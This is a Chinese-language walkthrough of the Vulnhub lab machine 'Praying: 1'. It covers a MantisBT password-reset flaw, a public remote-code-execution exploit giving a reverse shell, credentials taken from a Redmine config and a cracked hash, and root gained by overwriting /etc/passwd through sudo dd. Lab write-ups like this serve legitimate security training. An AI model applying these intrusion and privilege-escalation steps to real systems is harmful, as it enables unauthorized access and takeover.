Praying: 1 vulnhub walkthrough

最新推荐文章于 2023-03-09 16:03:02 发布

原创最新推荐文章于 2023-03-09 16:03:02 发布 · 483 阅读

2 ·

本内容遵循CC 4.0 BY-SA版权协议

vulnhub 专栏收录该内容

15 篇文章

订阅专栏

This blog post details a walkthrough of the 'Praying: 1' virtual machine on Vulnhub. The author first discovers a vulnerable MantisBT installation with an arbitrary password reset exploit, leading to a shell. Further exploration reveals user information, which is used to escalate privileges. By exploiting sudo access and modifying a file, the author ultimately gains root access." 121933511,8383725,现代密码学：哈希函数的生日攻击解析,"['密码学', '数学', '安全定义']

Praying: 1

虚拟机信息：http://www.vulnhub.com/entry/praying-1,575/

1. 获取shell

80/tcp   open   http           Apache httpd 2.4.41 ((Ubuntu))

服务器只开放了80端口，访问后为apache默认页面，于是用dirb跑了一下目录，发现了admin目录。

==> DIRECTORY: http://192.168.56.105/admin/

发现后发现为mantis的登陆页面

测试了一下发现依然存在任意账户口令重置漏洞。修改aministrator账户登陆，发现版本为2.3.0。

reset
利用searchsploit直接找到了命令执行代码。

Mantis Bug Tracker 2.3.0 - Remote Code E | php/webapps/48818.py

于是得到了第一个shell。

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.101:4444 
[*] Command shell session 1 opened (192.168.56.101:4444 -> 192.168.56.105:55892) at 2020-11-26 08:31:16 -0500

id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@praying:/var/www/html$

2. 获取root

先做了一些信息收集

cat /etc/passwd|grep /bin/bash
root::0:0:root:/root:/bin/bash
mantis:x:1000:1000:praying:/home/mantis:/bin/bash
developer:x:1001:1001:,,,:/home/developer:/bin/bash
projman:x:1002:1002:,,,:/home/projman:/bin/bash
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash
root:x:0:0:root:/root:/bin/bash
mantis:x:1000:1000:praying:/home/mantis:/bin/bash
developer:x:1001:1001:,,,:/home/developer:/bin/bash
projman:x:1002:1002:,,,:/home/projman:/bin/bash
elevate:x:1003:1003:,,,:/home/elevate:/bin/bash

ls -all /home
total 24
drwxr-xr-x  6 root      root      4096 Sep 24 23:01 .
drwxr-xr-x 20 root      root      4096 Sep 24 16:12 ..
drwx------  3 developer developer 4096 Sep 24 20:15 developer
drwx------  4 elevate   elevate   4096 Nov 26 13:12 elevate
drwx------  4 mantis    mantis    4096 Sep 26 23:25 mantis
drwx------  5 projman   projman   4096 Sep 26 23:27 projman

发现了用户mantis，于是查看还有没有该用户相关的文件。

发现存在/var/www/redmine目录，进入之后在database.yml找到了用户 projman的口令。

adapter: mysql2
  database: redmine
  host: localhost
  username: projman
  password: "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
  # Use "utf8" instead of "utfmb4" for MySQL prior to 5.7.7
  encoding: utf8mb4

切换用户登陆，发现该用户下有一个文件为.part1。

ls -all
total 36
drwx------ 5 projman projman 4096 Sep 26 23:27 .
drwxr-xr-x 6 root    root    4096 Sep 24 23:01 ..
lrwxrwxrwx 1 projman projman    9 Sep 24 23:19 .bash_history -> /dev/null
-rw-r--r-- 1 projman projman  220 Sep 24 20:11 .bash_logout
-rw-r--r-- 1 projman projman 3771 Sep 24 20:11 .bashrc
drwx------ 2 projman projman 4096 Sep 24 20:13 .cache
drwxrwxr-x 3 projman projman 4096 Sep 24 23:47 .local
-rw-r--r-- 1 projman projman   33 Sep 24 23:47 .part1
-rw-r--r-- 1 projman projman  807 Sep 24 20:11 .profile
drwx------ 2 projman projman 4096 Sep 26 23:27 .ssh
cat .part1
4914CACB6C089C74AEAEB87497AF2FBA

将该密码放到cmd5破解得到新的用户elevate的密码tequieromucho。

切换到该用户，查看sudo -l，发现可以sudo执行dd命令。这个就比较简单了，重写一个/etc/passwd取消root账户密码，成功获取root。这是新的passwd文件1.txt。

cat 1.txt
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
........................

elevate@praying:~$ sudo -u root dd if=1.txt of=/etc/passwd
sudo -u root dd if=1.txt of=/etc/passwd
[sudo] password for elevate: tequieromucho

8+1 records in
8+1 records out
4106 bytes (4.1 kB, 4.0 KiB) copied, 0.000241207 s, 17.0 MB/s
elevate@praying:~$ su - root
su - root
root@praying:~# ls
ls
message  part2  root.txt  snap
root@praying:~# cat root.txt
cat root.txt

 ██▓███   ██▀███  ▄▄▄     ▓██   ██▓ ██▓ ███▄    █   ▄████ 
▓██░  ██▒▓██ ▒ ██▒████▄    ▒██  ██▒▓██▒ ██ ▀█   █  ██▒ ▀█▒
▓██░ ██▓▒▓██ ░▄█ ▒██  ▀█▄   ▒██ ██░▒██▒▓██  ▀█ ██▒▒██░▄▄▄░
▒██▄█▓▒ ▒▒██▀▀█▄ ░██▄▄▄▄██  ░ ▐██▓░░██░▓██▒  ▐▌██▒░▓█  ██▓
▒██▒ ░  ░░██▓ ▒██▒▓█   ▓██▒ ░ ██▒▓░░██░▒██░   ▓██░░▒▓███▀▒
▒▓▒░ ░  ░░ ▒▓ ░▒▓░▒▒   ▓▒█░  ██▒▒▒ ░▓  ░ ▒░   ▒ ▒  ░▒   ▒ 
░▒ ░       ░▒ ░ ▒░ ▒   ▒▒ ░▓██ ░▒░  ▒ ░░ ░░   ░ ▒░  ░   ░ 
░░         ░░   ░  ░   ▒   ▒ ▒ ░░   ▒ ░   ░   ░ ░ ░ ░   ░ 
            ░          ░  ░░ ░      ░           ░       ░ 
 ███▄ ▄███▓ ▄▄▄      ███▄  ░ █ ▄▄▄█████▓ ██▓  ██████      
▓██▒▀█▀ ██▒▒████▄    ██ ▀█   █ ▓  ██▒ ▓▒▓██▒▒██    ▒      
▓██    ▓██░▒██  ▀█▄ ▓██  ▀█ ██▒▒ ▓██░ ▒░▒██▒░ ▓██▄        
▒██    ▒██ ░██▄▄▄▄██▓██▒  ▐▌██▒░ ▓██▓ ░ ░██░  ▒   ██▒     
▒██▒   ░██▒ ▓█   ▓██▒██░   ▓██░  ▒██▒ ░ ░██░▒██████▒▒     
░ ▒░   ░  ░ ▒▒   ▓▒█░ ▒░   ▒ ▒   ▒ ░░   ░▓  ▒ ▒▓▒ ▒ ░     
░  ░      ░  ▒   ▒▒ ░ ░░   ░ ▒░    ░     ▒ ░░ ░▒  ░ ░     
░      ░     ░   ▒     ░   ░ ░   ░       ▒ ░░  ░  ░       
 ██▀███░  ▒█████ ░ ▒█████  ▄▄▄█████▓▓█████ ▓█████▄░ ▐██▌  
▓██ ▒ ██▒▒██▒  ██▒▒██▒  ██▒▓  ██▒ ▓▒▓█   ▀ ▒██▀ ██▌ ▐██▌  
▓██ ░▄█ ▒▒██░  ██▒▒██░  ██▒▒ ▓██░ ▒░▒███   ░██   █▌ ▐██▌  
▒██▀▀█▄  ▒██   ██░▒██   ██░░ ▓██▓ ░ ▒▓█  ▄ ░▓█▄   ▌ ▓██▒  
░██▓ ▒██▒░ ████▓▒░░ ████▓▒░  ▒██▒ ░ ░▒████▒░▒████▓  ▒▄▄   
░ ▒▓ ░▒▓░░ ▒░▒░▒░ ░ ▒░▒░▒░   ▒ ░░   ░░ ▒░ ░ ▒▒▓  ▒  ░▀▀▒  
  ░▒ ░ ▒░  ░ ▒ ▒░   ░ ▒ ▒░     ░     ░ ░  ░ ░ ▒  ▒  ░  ░  
  ░░   ░ ░ ░ ░ ▒  ░ ░ ░ ▒    ░         ░    ░ ░  ░     ░  
   ░         ░ ░      ░ ░              ░  ░   ░     ░     
                                            ░             
https://www.youtube.com/watch?v=T1XgFsitnQw